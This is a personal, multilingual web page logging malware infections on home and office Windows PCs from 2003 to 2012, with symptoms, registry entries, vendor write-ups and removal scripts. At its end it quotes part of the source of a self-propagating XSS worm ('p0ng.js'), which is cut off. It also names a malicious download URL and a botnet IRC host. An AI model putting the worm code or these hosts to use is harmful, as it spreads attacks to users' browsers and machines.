home / virus (navigation links) The best attacks are when the code executes as the page loads,
rather than having an attacker click on a link,
so pay close attention to OnLoad() events.
C 2k4 m | X 2k4 s | J 2k4 s | J 2k4 d | S 2k5 g | S 2k7 f | M 2k7 m | X 2k7 n | S 2k7 n | S 2k8 f | S 2k8 m | CMI 2k9 a Reg | Dubtes | Lectura | Links | End
Consells

Mes consells ( 2 move ! )

En Pep diu : Jo faig servir l'avast com a antivirus, que és gratuït per a usuaris domèstics: http://www.avast.com. I com anti-spyware faig servir l'SpyBot: http://www.safer-networking.org.

PE_NIMDA.A-O

This is a fast-spreading Internet worm and file infector in pure and original form. It arrives as an embedded attachment, README.EXE file, in an email that has an empty message body and, usually, an empty subject field. It does not require the email receiver to open the attachment for it to execute. It uses a known vulnerability in Internet Explorer-based email clients to execute the file attachment automatically. This is also known as Automatic Execution of Embedded MIME type.
The infected email contains the executable attachment registered as content-type of audio/x-wav so that when recipients view the infected email, the default application associated with audio files is opened. This is usually the Windows Media Player. The embedded EXE file cannot be viewed in Microsoft Outlook.

Few dangerous pages

Març 2003 : en Jordi té un virus

Els síntomes son :

Ha rebut un missatge dient que enviaba correus amb el virus w32.klez@mm
Veure qui es

Setembre 2004 : en Jordi té el Sasser

From here : 

Microsoft Windows contains a vulnerability that can allow an attacker to execute arbitrary code.
The vulnerability is due to a lack of bounds checking on messages
submitted to the Local Security Authority Subsystem Service (LSASS) service.
An attacker can supply a long argument using the LSASRV.DLL function DsRoleUpgradeDownlevelServer()
to create a carefully constructed message and cause an overflow,
which can result in arbitrary code execution.

Keyword(s): Sasser, Cycle, Korgo, Bobax

Fix : KB 835732 from here (04-011)

Dec-2004 : el Sebas el té al XP ... uSoft says to install security update KB835732, [2.647 KB] from here
Removal tool [KB841720] is here [114 KB]

En Sebas té un virus : Octubre 2003

Amb la conexió commutada a Internet, normalment es reben deu vegades mes dades que les que s'envien. Al P4, des Octubre del 2003, vaig notar que s'enviaben mes dades que se'n rebien. Mirant una mica millor, vaig veure que hi havia un fluxe constant de uns 6.000 bytes per segon de sortida, reflectits als comptadors de la icona de la conexió, sense que jo estigués teclejant res.

Fent servir TCPview veig ( from SysInternals, as RegMon ) 


+++ start of NETSTAT -AN +++
--- Protocol --- Local IP --------- Remote IP ---------- State ---
  TCP    194.224.211.135:1666   194.224.75.25:135      TIME_WAIT
  TCP    194.224.211.135:1708   194.224.93.5:135       TIME_WAIT
  TCP    194.224.211.135:1715   194.224.93.35:135      TIME_WAIT
  TCP    194.224.211.135:1716   194.224.93.36:135      TIME_WAIT
  TCP    194.224.211.135:1719   194.224.94.2:135       TIME_WAIT
  TCP    194.224.211.135:1720   194.224.94.5:135       TIME_WAIT
  TCP    194.224.211.135:1721   194.224.94.6:135       TIME_WAIT
  TCP    194.224.211.135:1723   194.224.94.17:135      TIME_WAIT
  TCP    194.224.211.135:1724   194.224.94.31:135      TIME_WAIT
  TCP    194.224.211.135:1726   194.224.94.37:135      TIME_WAIT
  TCP    194.224.211.135:1727   194.224.94.38:135      TIME_WAIT
  TCP    194.224.211.135:1728   194.224.94.39:135      TIME_WAIT
  TCP    194.224.211.135:1729   194.224.94.40:135      TIME_WAIT
  TCP    194.224.211.135:1730   194.224.94.41:135      TIME_WAIT
  TCP    194.224.211.135:1735   194.224.94.46:135      TIME_WAIT
  TCP    194.224.211.135:1736   194.224.94.47:135      TIME_WAIT
  TCP    194.224.211.135:1737   194.224.94.48:135      TIME_WAIT
  TCP    194.224.211.135:1738   194.224.94.49:135      TIME_WAIT
  TCP    194.224.211.135:1739   194.224.94.50:135      TIME_WAIT
  TCP    194.224.211.135:1740   194.224.94.51:135      TIME_WAIT
  TCP    194.224.211.135:1741   194.224.94.53:135      TIME_WAIT
  TCP    194.224.211.135:1742   194.224.94.54:135      TIME_WAIT
  TCP    194.224.211.135:1743   194.224.94.55:135      TIME_WAIT
  TCP    194.224.211.135:1744   194.224.94.56:135      TIME_WAIT
  TCP    194.224.211.135:1745   194.224.94.57:135      TIME_WAIT
  TCP    194.224.211.135:1746   194.224.94.58:135      TIME_WAIT
  TCP    194.224.211.135:1747   194.224.94.59:135      TIME_WAIT
  TCP    194.224.211.135:1883   194.224.125.14:135     TIME_WAIT
  TCP    194.224.211.135:1898   194.224.126.142:135    TIME_WAIT
  TCP    194.224.211.135:1964   194.224.132.41:135     TIME_WAIT
  TCP    194.224.211.135:2015   194.224.135.1:135      TIME_WAIT
  TCP    194.224.211.135:2017   194.224.135.3:135      SYN_SENT
  TCP    194.224.211.135:2018   194.224.136.8:135      SYN_SENT
  TCP    194.224.211.135:2019   194.224.136.40:135     SYN_SENT
  TCP    194.224.211.135:2020   194.224.136.41:135     SYN_SENT
--- end of NETSTAT -AN ---

A Google diuen que 

 Yes, a virus; most likely some Blaster variant.

Read Symantec about W32.Blaster.Worm : W32.Blaster.Worm exploits the DCOM RPC vulnerability, as described in uS Security Bulletin MS03-026. This worm attempts to download the MSBLAST.EXE file to the %WinDir%\system32 directory and then execute it.
And uSoft.

Mirant "Task Manager" abans i després es veu que apareix SVCHOST.EXE : 

 atiptaxx.exe
 carpserv.exe
 CSRSS.EXE
 DLLHOST.EXE
 explorer.exe
 imonnt.exe
 imontray.exe
 internat.exe
 LSASS.EXE
 mstast.exe
 NTVDM.EXE
 regsvc.exe
 SERVICES.EXE
 SMSS.EXE
 SMTray.exe
 spoolsv.exe
 svchost.exe
 svchost.exe
 svchost.exe
 System
 System Idle Process  
 taskmgr.exe
 WINLOGON.EXE
 WinMgmt.exe
 WlanMonitor.exe

Buscant per tot el disc, descobreixo un punt interessant : 

D:\>dir svchost.exe /s

 Volume in drive D is W2K
 Volume Serial Number is E82F-148F

 Directory of D:\WINNT\system32

06/12/1999  14:00                7.952 svchost.exe
               1 File(s)          7.952 bytes

 Directory of D:\WINNT\system32\dllcache

06/12/1999  14:00                7.952 svchost.exe
               1 File(s)          7.952 bytes

 Directory of D:\WINNT\system32\wins

03/09/2003  23:43               19.728 SVCHOST.EXE
               1 File(s)         19.728 bytes

     Total Files Listed:
               3 File(s)         35.632 bytes
               0 Dir(s)     558.993.408 bytes free

I el "SVCHOST.EXE" del directori "WINS" s'identifica (mitjançant "STRINGS") com 

"TCP/IP Trivial File Transfer Protocol"

El W2K WS porta (Start + Help + Index) "Network Monitor driver". S'instala com a "Protocol" de "Microsoft". Però ... cal un "Network Monitor"del W2K Server per veure les dades ... 

"If you are running Windows˙2000 Server,
you can use Network Monitor to display and analyze
the information you collect with the Network Monitor Driver."

Avui vaig a posar un FireWall : ZoneAlarm : zlsSetup_45_538.exe [4,8 MB] o zlsSetup_45_538_001.exe o zlsSetup_55_062_004.exe
From here : [4,8 MB] Thanks Ramon Milà
De seguida m'avisa que DLLHOST.EXE es el virus Welchia/Nachi, i efectivament tinc \WINS\DLLHOST.EXE i \WINS\SVCHOST.EXE

La millor explicació l'he trobat aquí.
Instala los siguientes servicios :

http://www.sophos.com/support/disinfection/nachia.html says :

W32/Nachi-A relies upon two vulnerabilities in Microsoft's software. Sophos recommends that users ensure their computers are patched against these vulnerabilities. The two patches have been available from Microsoft since March and July 2003 respectively.
For more information on the vulnerabilities and to download the patches please visit Microsoft's website at the following urls:

www.microsoft.com/technet/security/bulletin/MS03-026.asp
www.microsoft.com/technet/security/bulletin/MS03-007.asp

Conclusió : use a Firewall !

En Sebas té un SpyWare : fsg_4104.exe, Novembre 2003

En Ramón Milà em diu que es un Gator SpyWare.

Get SpyBot Search & Destroy ? [3,5 MB, free] *** do it ! ***
See PestPatrol elements : Key Loggers, RATs (Remote Administration Trojans), SpyWare, Trojans, Worms, etc.
Aqui diu A spyware installed with common application such as the file sharing software iMesh. This process should be removed to ensure your personal privacy.
Here is a Scanner + Remover

En Chicho té un Adware : msa64chk.dll, Març 2004

Best description. REGSVR32 /u msa64chk.dll and REGSVR32 /u msapasrc.dll + reboot

Corro el PestScan al T30 i trobo :

Virus al T30

2004

Starting May 3-rd 2004, in Portugal but in IBMs Intranet, my W2K crashes LSASS.EXE every 2-3 hours.
In "My PC"\HKLM\Software\Microsoft\Windows\CurrentVersion\Run comes up : c:\winnt\system32\THLNTSESS.EXE, that requests a way to Internet (Zone Alarm says). There was also a IIC21.EXE file in C:\Documents and Settings\SP87026\Local Settings\Temp

See F:\MISCOSAS\vir\2004May

Solució : install windows2000-kb835732-x86-enu.exe

T30 al 2005

09/09/2005 el T30 (sense ZoneAlarm 15 minuts) em diu
The system process c:\winnt\system32\services.exe has terminated unexpectedly with rc=128

URL - This issue may occur if there are incorrect references to shared folders

Mark

Symantec (13/09/2005) em troba c:\winnt\system32\FCMIXC.EXE i l'esborra. Diu que es w32.IRCBot ...

w32.IRCBot : When a vulnerable system is found, it uses a buffer overflow to write the worm file to that machine via a TFTP upload on port 8594. w32.IRCBot.B attempts to connect to the IRC server, itc.ourmoney.pp.ruz, using TCP port 31337.

14/09/2005 el T30 (sense ZoneAlarm 15 minuts) + Symantec em troba c:\winnt\system32\GECB.EXE i l'esborra. Diu que es w32.SpyBot.Worm ...

21/09/2005 el T30 (sense ZoneAlarm 15 minuts) em diu
The system process c:\winnt\system32\services.exe has terminated unexpectedly with rc=128

13/10/2005 el T30 (sense ZoneAlarm 15 minuts) repeteix "status code 128".

Crec que s'hauria de aplicar MS05-039 ... pero requereix SP4 !
Aquí diu el mateix [ MS05-039 - KB899588 ]
Sembla que es el virus Zotob

Els problemes d'en Xavi, Septembre 2004

Al Setembre 2004, en Xavi es desperta amb un PC "infectat" ...

Abans de formatejar el disc dur, s'ha de :

Els problemes d'en Josep, Septembre 2004

Al Setembre 2004, en Josep Montmany diu que té un DROPPER.DELF.DV dins el MSSYS.EXE sota XP.

Al registre hi ha un NWIZ.EXE ... (???)

Probar el "SysClean" de TREND ... URL and ReadMe

Els problemes d'en Jordi, Desembre 2004

Al Desembre 2004, en Jordi Espinal em diu que la Mireia te damunt l'escriptori unes icones que no es poden esborrar, cal no tenen "Propietats" ... Website Hosting, Bingo, Casino Online, Printer Cartridges, Card Games, Poker, Travel
Akí diuen :

The Trojan may register some of the retrieved files to load at Windows startup by adding entries into the registry such as these examples - 

 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
 "thunkburn" = %path%\Owns This Vc.exe

 HKEY_CLASSES_ROOT\CLSID\{%unique CLSID%}
 "64535DBE" = 2C0411726CB7B446F792

 HKEY_CLASSES_ROOT\CLSID\{%unique CLSID%}\InprocServer32\
 "(Default)" = %path%\Drive bin.exe
 "ThreadingModel" = Apartment

 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"DeleteDefySendRoad" = %path%\Thunkfilm.exe
In one "nice" aspect, at least one of the downloaded files has an uninstall routine which can be accessed by the "Add/Remove Software" applet from the control panel - 
     HKEY_CURRENT_USER\Software\Microsoft\Windows\
     CurrentVersion\Uninstall\64 slow user\
     "DisplayName" = Search Plugin
     "UninstallString" = %path%\Owns This Vc.exe -uninstall

Caused by Messenger Plus

Solució : http://windowsxp.mvps.org/toolbarcop.htm or http://lop.com/new_uninstall.exe [***]

O fer servir Start > Run > MSCONFIG
Look in the Startup tab ... Uncheck and Restart ...

Telefonica DNS's : 80.58.0.33 and 80.58.32.97

En Sebas té TEEKIDS.EXE, Gener 2005

Jo diria que esta associat al Opera : he estat navegant molta estona amb el Firefox, i res. En un moment donat, obro el Opera, i s'engega el "Shutdown". L'aturo, pero el tallafocs engantxa la sortida del teekids.exe, que està situat a c:\windows\system32 i al registre !

VsanVirus diu : 

 Vulnerabilidad RPC/DCOM: MS03-026
y "filtrar con un cortafuegos los siguientes puertos : udp/135, udp/137, udp/138, tcp/135, tcp/445, tcp/593, tcp/69, udp/69".

Per un de similar, diu :
La falla en el componente LSASS (MS04-011), usada también por gusanos como Sasser, Cycle, Bobax, Korgo, etc., permite infectar equipos con Windows XP y 2000 sin el parche correspondiente instalado, - 835732 -, por el simple hecho de conectarse estos a Internet, no siendo necesaria la ejecución de ningún archivo o adjunto que involucre acción alguna por parte del usuario.
La segunda (MS03-026), es la misma falla de la que se aprovecha el Lovsan (Blaster) y otros. Utiliza el puerto TCP/135. La falla se produce por un desbordamiento de búfer en la interfase RPC (Remote Procedure Call) que permite la ejecución arbitraria de código. El parche existe desde julio de 2003. ( 03-039 : 824146 )
La tercera (MS03-001), cuyo parche está disponible desde enero de 2003, - 810833 -, es explotada a través del puerto TCP/445. La falla ocurre en el sistema localizador RPC (Remote Procedure Call). 

 TEEKIDS.EXE - es el gusano
 ROOT32.EXE - troyano tipo backdoor

www.microsoft.com/technet/security/bulletin/MS03-026.asp
www.microsoft.com/technet/security/bulletin/MS04-011.mspx

Feb 2007, Airis (Nicolau) : W32/MSNVB-D worm

Today, I've catched (ZoneAlarm) ttt.exe, zap.exe, hide.exe, avconsol.exe trying to connect to 72.14.207.95

url

Files : (hidden ?)

<Windows>\Avconsol.exe <Windows>\Zap.exe <System>\Hide32.exe <System>\Ttt.exe

Registry : (HKCU!)

HKCU\Software\Microsoft\Windows\CurrentVersion\Run Nom : WinService Contingut : <System>\Ttt.exe HKCU\Software\Microsoft\Windows\CurrentVersion\Run Nom : AVantivirus Contingut : <Windows>\Avconsol.exe HKCU\Software\Microsoft\Windows\CurrentVersion\Run Nom : System Contingut : <Windows>\Zap.exe HKCU\Software\Microsoft\Windows\CurrentVersion\Run Nom : Servicewin Contingut : <System>\Hide32.exe HKCU\Software\VB and VBA Program Settings\Form1\TextBox
Mar 2007, Marta Planell : Brontok
Nov 2007, Xavi : Trojan Mailskinner
Nov 2007, P4 : WAQ.EXE
Feb 2008, Nico

MATAR.CMD :

del c:\windows\system32\WMSNL.EXE del c:\windows\system\LSASS.EXE del c:\windows\*.zip del c:\windows\temp\*.TMP del c:\Documents And Settings\Arcadi\Local Settings\Temporary Internet Files\Content.IE5 *.* /s /q del c:\Documents And Settings\Irina\Local Settings\Temporary Internet Files\Content.IE5 *.* /s /q del c:\Documents And Settings\Nicolau\Local Settings\Temporary Internet Files\Content.IE5 *.* /s /q del c:\Documents And Settings\Karme\Local Settings\Temporary Internet Files\Content.IE5 *.* /s /q del c:\Documents And Settings\Sebastia\Local Settings\Temporary Internet Files\Content.IE5 *.* /s /q

Conclusió : hi havia 3 virus.

Solució :

cCleaner

Trobo a c:\windows\temp un fitxer bloquejat : ZLT022fd.TMP ! És de ZoneAlarm, vsmon.exe ...

Al engegar, un CMD line fa quelcom ... (2 finestres)

Persegueixo el virus amb el Filemon dins el Startup. Vull saber qui escriu el fitxer a c:\windows\temp !

Després de que NAV ni Gmail es queixessin dels fitxers A1FF.TMP, he instalat KAV 7.0.1.325 i, curiosament, em demana de treure Zone Alarm ! De seguida troba el troyano CRYPTS.DLL, i l'esborra. I màgicament desapareix un WinLogon que escoltava a 127.0.0.1:1025 (TCPview).

REGMON.LOG, line 5613150: regedit.exe:3484 QueryValue HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\Notify\crypt\DLLName SUCCESS "crypts.dll"

Drops the following files in the Windows directory: scins.exe, winserv.exe, fierms.exe, and madopew.dll.

url

* %WINDIR%\SYSTEM32\crypts.dll (29,696 bytes)
The files are internally compressed with UPX packer. The downloader uses Winlogon notification packages as registered DLLs that the Winlogon process loads at startup.

url

Explicació del mecanisme : Winlogon Notification Packages

The filename CRYPTS.DLL was first seen on Sep 13 2007 in SPAIN.
The unsafe files using this name are associated with the malware group TROJAN.SOBAR
Added as a Winlogon Notification DLL to automatically load on system start up.

url

Troj/Agent-GJR Trojan

url

20080223 : Kaspersky segueix treballant :

Maig 2008, P4

Solució : posar AVG.

Se'm menja la conexió a Internet conectant el Explorer a 66.186.63.188:7000 = "CUSTOMER.VPLS.NET" El trec.

Lista de troyanos por puerto: port 7000 Exploit Translation Server, Kazimas, Remote Grab, SubSeven, SubSeven 2.1 Gold

Ccleaner, en engegar, també vol anar a 66.186.63.188 ...

Solució : posar Avast.

Ara el Microchoft Explorer es vol conectar a 67.198.204.18:1863 = "CUSTOMER.VPLS.NET" El filtro amb el ZoneAlarm.

sfc /scannow = verify that all protected files are intact

ShellExView = identifica dll's y procesos que corren en el shell (explorer.exe)

(remote, net scan) Symantec 9.0.5.1000, ki := 'symantec' !

El explorer.exe peta amb el missatge "setting up personalized settings for c:\recyclers\" Al disc "D:\" hi ha
D:\RECYCLER\S-1-5-21-1482476501-1644491937-682003330-1013
i a dintre hi ha ISE32.exe de 14.336 bytes !

Solució : URL

@echo off title Malware Removal Tool ;) - By Smartgenius color 0a taskkill /f /im explorer.exe reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL /v CheckedValue /t REG_DWORD /d 1 /f ping -n 2 0.0.0.0 > nul c: cd c:\ attrib -r -s -h RMDIR /S /Q RECYCLER\S-1-5-21-1482476501-1644491937-682003330-1013 del /f %windir%\Prefetch\ISE32.EXE-34CFE4CB.pf del /f %windir%\Prefetch\ISE32.EXE-273EA8B7.pf del /f %windir%\Prefetch\ISEE.EXE-05DD3401.pf D: cd d:\ attrib -r -s -h del /f autorun.inf RMDIR /S /Q RECYCLER\S-1-5-21-1482476501-1644491937-682003330-1013 explorer msg /w * Gracias por usar este soft exit

Cheers, SmartGenius !

Abril 2009, CMI has TWEXT.exe

Follow these steps :

  1. Deshabilitar restauración del sistema

    Windows XP

    1. En el panel de Inicio pulse sobre "Mi PC"
    2. Haga clic en "Ver información del sistema"
    3. Seleccione la etiqueta "Restaurar sistema"
    4. Marque la casilla "Desactivar Restaurar sistema en todas las unidades" y pulse en "Aplicar".
    5. El sistema le preguntará si está seguro de querer deshabilitarlo. Confírmelo pulsando en SÍ.
    6. La opción que muestra el estado de los discos en la ventana "Configuración de la unidad" aparecerá deshabilitada (todo gris). Pulse en el botón Aceptar.

  2. Reinicie su ordenador en Modo Seguro o Modo a Prueba de Fallos.

    Windows Vista/XP/2000.

    Presione la tecla F8 después de los mensajes de autodiagnóstico (POST) de la placa base. Dependiendo de la configuración puede que aparezca el mensaje "presione F8 para menú de inicio" durante una pausa de 2 segundos. En caso contrario, presione F8 repetidadmente mientras arranca el PC hasta que aparezca el menú de inicio, y elija "Modo seguro" o "Modo a prueba de fallos".

  3. borrar c:\windows\system32\twext.exe

url

Use autoruns.exe.

Desembre 2009, TCS has A0060612.exeT.exe
taskkill /f /im explorer.exe attrib -h -r -s S-1-5-21-1482476501-1644491937-682003330-1013 del S-1-5-21-1482476501-1644491937-682003330-1013 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{08B0E5C0-4FCB-11CF-AAX5-90401C608512}\ StubPath = “C:RECYCLERS-1-5-21-1482476501-1644491937-682003330-1013ise.exe”
Novembre 2010, Nicolau has cleansweep.exe

Double accent virus (Notepad, Firefox) :

h:\cleansweep.exe\cleansweep.exe
Març 2011, TCS@Dipu has PINK SLIP BOT

Pending to investigate ...

Març 2011, SAG T400 goes Stand By

Installing all updates ...

"Updates could not be installed" :
c:\WINDOWS\system32\CatRoot2\edb.log -> delete EDB.LOG and/or rename CatRoot2 folder.
c:\windows\Windowsupdate.log ;

Març 2011, K#1
W32.downadup VKPN[1].JPG @ c:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files c:\windows\system32\X Solució : MS08-067 = KB958644 ;
Abril 2012, Angel te un Ukash

El archivo malware se llama mahmud.exe y se instala en

C:\Documents and Settings\Nombre de usuario\AppData\Roaming\

Regedit : locate HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Find the registry key named Shell. Should be something like C:\Documents and Settings\username\desktop\VIRUS INFO.exe, located after "Explorer.exe"

En engegar la maquina, un RUNDLL32 activa c:\Documents and Settings\RAFI\Local Settings\temp\WPBT0.DLL

Maig 2012, Lourdes i net.exe

Symptoms:

Solucio :

Uninstall Norton Ghost with the Norton Removal Tool.

Registre

Vigilar :

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce HKEY_CURRENT_USER\Software\Microsoft\WindowsNT\CurrentVersion\WinLogon\ HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\WinLogon\Shell
Explorer.exe
Delete MSN Gaming Zone

El directori c:\Program Files\MSN Gaming Zone\Windows es re-omple màgicament després de esborrar-lo !

MS has hidden it very well, but it's there. Go to Add/Remove Programs, select Add/Remove Windows Components on the left, select Accessories and Utilities (don't uncheck it) and click Details... Then select Games (don't uncheck it) and again click Details... Uncheck Internet Games, then click OK, OK, OK, etc. Magically, all those evil MSN games are gone.

url

Encara no puc esborrar el directori c:\P F\MSN Gaming Zone\windows\ Owned by : ?

Com s'esborra \xerox\nwwia ?

Com nassos s'esborra la carpeta c:\Archivos de Programa\xerox\nwwia ?

Rename all sfcfiles.dll into sfcfilesold.dll and reboot.

Com es fà això ?

url

W32.Kabel.B@mm [...] opens a back door on TCP port 58641 allowing a remote attacker to gain unauthorised access to the compromised computer.

Solució : Turn off and remove unneeded services.

Antiparásitos Ciberp@is [23/Sept/2004]

URL's :

Antiparásitos The Scream !

URL (descr), pack.

BHOList - A front end for Tony Kleins BHO collection. Download the latest lists.
CWShredder - A tool for the removal of CoolWebSearch and it's variants.
EndItAll 2 - A modified three finger salute!
HijackThis! - Lists running processes, startups and more.
Startup CPL XP - A very useful full featured startup logger.
StartupList - Displays a list of all startup entries in Notepad.
BHO Demon - Lists all installed BHO's.
LSP-FIX - Winsock 2 repair utility.
Process Viewer - Allows you to view what's actually running.
Process Explorer XP-NT - Provides detailed information about running processes.
Spybot S&D 1.3 - Anti spyware utility.
AboutBuster 1.26 - Removes about:blank hijacks.

Registro limpio

Tras instalar W2K, el Registro contiene : 

     HKLM -> Software -> Microsoft -> Windows -> Current Version -> Run

     Synchronization Manager       mobsync.exe /logon
Clean it from time to time !

Scan On Line

Free downloads

Firewall Zone Alarm v 4.5 [5,9 MB]

Spy Hunter.

SpyWare removal or Ad-Aware

SpyBot. How to Enable/Disable it

Debian and SucKIT 

Just run:
   # ls -li /sbin/init /sbin/telinit

 Here is the output on a normal machine:
   304579 -rwxr-xr-x   1 root    root    26920 Mar 14  2002 /sbin/init*
   304587 lrwxrwxrwx   1 root    root        4 Dec  2 13:18 /sbin/telinit -> init*

 Here is the output on a compromised machine:
    85133 -rwxr-xr-x   1 root    root    25636 Mar 26 20:03 /sbin/init
    85133 -rwxr-xr-x   1 root    root    25636 Mar 26 20:03 /sbin/telinit

 In the second case, telinit is a real file (not a symlink) and its time is the time
 of the rootkit installation. Note also the incorrect information:
 both files have the same inode number but a reference count of one;
 this comes from the kernel module hiding the real information.

Fixed in Linux 2.4.23 - SuSE 8.2 is 2.4.20 !

Neteja PC's de casa

Mitjaçant T42 & Symantec

PC name Deit
P4 12/07/2008
RAP 02/08/2008
HP Arcadi  
HP Kayak  

Epidemies

2003 Best :

  • SQL Slammer - el más eficaz
  • Bugbear.B - el más dañino
  • Klez.I - el más persistente
  • Gibe.C - el más ingenioso
  • Nachi.A - el más ladino
  • Ganda.A - el más oportunista
  • Sobiq.F - el más rápide

2004 Best :

  • Downloader.GK trojan
  • Netsky.P
  • Sasser.ftp
  • Gaobot.gen
  • Mhtredir.gen
  • Netsky.D
  • Downloader.L
  • Qhost.gen
  • Netsky.B
  • StartPage.FH

Agost 2005 [La Vanguardia, 18/08/2005]

  • ZotoB
  • Rbot
  • Bozori

Noticies

Según informa 'The New York Times' Un virus bloquea empresas, instituciones y medios de comunicación en EE.UU. Atacó principalmente los sistemas que operan con Windows 2000

LVD - 17/08/2005 - 09.45 horas

Washington. (EFE).- Un virus informático del tipo gusano atacó los sistemas que operan con Windows 2000 en empresas, instituciones y medios de comunicación de Estados Unidos, entre ellos las cadenas de televisión CNN y ABC y el diario "The New York Times".
Los problemas en la CNN y en el diario neoyorquino se resolvieron en 90 minutos y sus operaciones no se vieron afectadas, según fuentes oficiales.
El virus también apagó ordenadores en el Congreso, que está en receso de verano, y causó problemas en los de la agencia de noticias Associated Press (AP) y de la industria de maquinaria agrícola Caterpillar, en el estado de Illinois.
Sin embargo, una fuente de la Oficina Federal de Investigaciones (FBI) manifestó que los problemas que han surgido en los sistemas informáticos no parecen ser parte de algún ataque generalizado.
CNN, que dijo que la infección se ha extendido a Alemania y algunos países asiáticos, informó de que sus ordenadores comenzaron a fallar tanto en Nueva York como en Atlanta a partir de las 23.00 GMT, mientras que las dificultades de ABC fueron advertidas poco después de las 17.30 GMT.
La cadena de televisión por cable citó las declaraciones de un experto que manifestó que el ataque parece ser obra de un gusano informático llamado "rbot.ebq".
Añadió que sus principales síntomas son una repetida conexión y desconexión del ordenador.
Lysa Myers, de la firma de seguridad informática McAfee, señaló que el gusano aprovecha un punto vulnerable del sistema de Microsoft.
Por su parte, Johannes Ullrich, director de una firma de seguridad informática con sede en Jacksonville (Florida), añadió que el origen del problema puede ser el virus "zotob", del tipo "gusano", cuya existencia fue denunciada el lunes.
Según dijo Ullrich a la CNN, este gusano se conecta a un servidor para pedir instrucciones y después recorre las redes con la intención de infectarlas.
Indicó que, aunque afecta principalmente al sistema Windows 2000, también puede dañar o interrumpir las funciones de algunas versiones anteriores de Microsoft XP.
La existencia del virus "zotob" fue denunciada el lunes en Seattle por el gigante informático Microsoft Corp, que indicó que su blanco son los fallos detectados en el sistema de Windows.
La empresa de seguridad informática Trend Micro Inc. indicó que ese "gusano" dirige sus ataques a los sistemas Windows 95, 98, ME, NE, 2000 y las plataformas XP.
Según David Perry, experto de Trend Micro, el gusano informático puede ser una derivación del "zotob" y anticipó que los daos serán "menores" y que los expertos lograrán neutralizar al "gusano". La semana pasada, Microsoft suministró "parches" para resolver los problemas de seguridad del sistema.

MS05-039

Un virus deja a los medios de EE. UU. sin ordenadores

LA VANGUARDIA - 18/08/2005 Agencias. BARCELONA

Los principales medios de comunicación estadounidenses han tenido que desempolvar sus viejas máquinas de escribir debido a un virus informático que ha puesto en jaque todo el sistema de ordenadores. Un gusano se coló en el sistema informático de empresas periodísticas tan importantes como The New York Times, ABC y CNN, las cuales tuvieron que recurrir a la alternativa de la máquina para poder proseguir con su trabajo. Los expertos creen que es una consecuencia de las guerras internas que hay en EE. UU entre bandas piratas.
El problema comenzó a detectarse el pasado martes cuando varias cadenas de televisión y diarios vieron como su sistema informático sufría graves alteraciones. Entre los gusanos inform ticos parece encontrarse el Zotob, que comenzó su ronda por internet el fin de semana, y nuevas variantes de Rbot y Bozori. Aunque los entendidos no saben de dónde proceden los virus, la firma de seguridad F-Segure, experta en el tema, plantea la hipótesis de que el ataque es el resultado de la competición entre bandas rivales de piratas informáticos.
"Parece que hay tres diferentes bandas de diseñadores de virus que lanzan nuevos gusanos a una velocidad alarmante, como si estuvieran compitiendo para hacerse con el mayor número posible de máquinas infectadas", manifestaron desde F-Secure.
Microsoft quitó hierro al asunto y dijo que, a pesar de los problemas de organización en los medios de comunicación, es improbable que los códigos malignos causen tanto caos como el que produjeron virus como MyDoom o Sobig.

MS05-039

url

The "WORM_RBOT.CBQ" worm has been detected wintbp.exe is the host of the worm.

url

\\vir\10.1.1.115.639.pdf

Behavior blockers

Behavior blockers

Felicitació de Nadal 2007

Arriba una felicitació que per llegir has de picar aqui.

... que et porta a http://get.willadd.com/get.php que posarà al teu PC gogocard.gif.exe !

/** * @name: +-+-+-+-+-+-+-+-+-+-+-+ P 0 N G ! +-+-+-+-+-+-+-+-+-+-+-+ * @file: p0ng.js * @author: 0x000000, Ronald van den Heetkamp & guests * @func: universal xss worm * @date: 2008.01.07 * **/ /*** string components ***/ String.prototype.urlencode = function(){ return encodeURIComponent(this); } String.prototype.xsplit = function(q,x) { b = this.split(q); return b[x]; } String.prototype.xor = function(n) { x = this; y = n; x ^ y; y = x ^ y; x = x ^ y; return x; } String.prototype.rand = function(n) { n ? n = parseInt(n) : n = 1024; return (Math.floor(Math.random () * n + 1 )); } String.prototype.zeroFill = function(d) { var str = this; while (str.length < d) { str = "0" + str; } return str; } String.prototype.getCharCodes = function() { var codes = []; for(var i=0; i<this.length;i++) { codes.push(this.charCodeAt(i)); } return codes; } String.prototype.toUnicode = function() { var code = ''; var codes = this.getCharCodes(); for(var i=0; i<codes.length;i++) { code += '\\u' + codes[i].toString(16).zeroFill(4); } return code; } String.prototype.toOctal = function() { var code = ''; var codes = this.getCharCodes(); for(var i=0; i<codes.length;i++) { code += '\\' + codes[i].toString(8); } return code; } String.prototype.toHex = function() { var code = ''; var codes = this.getCharCodes(); for(var i=0; i<codes.length;i++) { code += '\\x' + codes[i].toString(16); } return code; } /*** array components ***/ Array.prototype.in_array = function(str) { ret = false; for (i=(this.length-1); i>=0; i--) { if (this[i] == str) { ret = true; } } return ret; } /*** worm auto-append component ***/ function worm(uri) { w = document.createElement('script'); uri ? u = uri : u = window.location.href; w.src = u; try { document.getElementsByTagName('head')[0].appendChild(w); } catch(ex) { document.getElementsByTagName('body')[0].appendChild(w); } }; /*** worm XHR object ***/ function xhr() { var xhtp,xml,s; try { xhtp = new XMLHttpRequest(); s=true; } catch(ex) { xml = ['MSXML2.XMLHTTP','MSXML2.XMLHTTP.3.0','MSXML2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.5.0','MSXML2.XMLHTTP.6.0','MSXML2.XMLHTTP.7.0']; for (i=(xml.length-1) && !s; i>=0; i--) { try { xhtp = new ActiveXObject(xml[i]); s=true; } catch(ex) { s=false; } } } return xhtp; }; Object.prototype.post = function(uri,arg) { /*** usage: xhr().post('foo.php'); ***/ this.open('POST', uri, true); this.setRequestHeader('Content-type', 'application/x-www-form-urlencoded'); this.setRequestHeader('Content-length', arg.length); this.setRequestHeader('Connection', 